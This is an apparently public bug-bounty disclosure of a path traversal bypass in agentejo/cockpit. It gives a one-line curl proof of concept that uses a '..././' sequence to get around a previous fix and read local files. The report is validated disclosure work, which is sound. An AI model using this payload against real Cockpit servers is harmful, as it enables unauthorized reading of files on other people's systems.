External Control of File Name or Path in agentejo/cockpit
Sep 9th 2021
Bypass of previous fix
🕵️♂️ Proof of Concept
I see you recently fixed local-file-inclusion bug https://huntr.dev/bounties/a65d700c-1561-46c1-a9c2-cba6ed960f94/.
And the fixed patch is https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596 .
But it can be bypassed easilly using bellow url
curl --path-as-is http://10.0.2.15:8080/api/public/..././custom?test=win
local file read
Artur validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
to join this conversation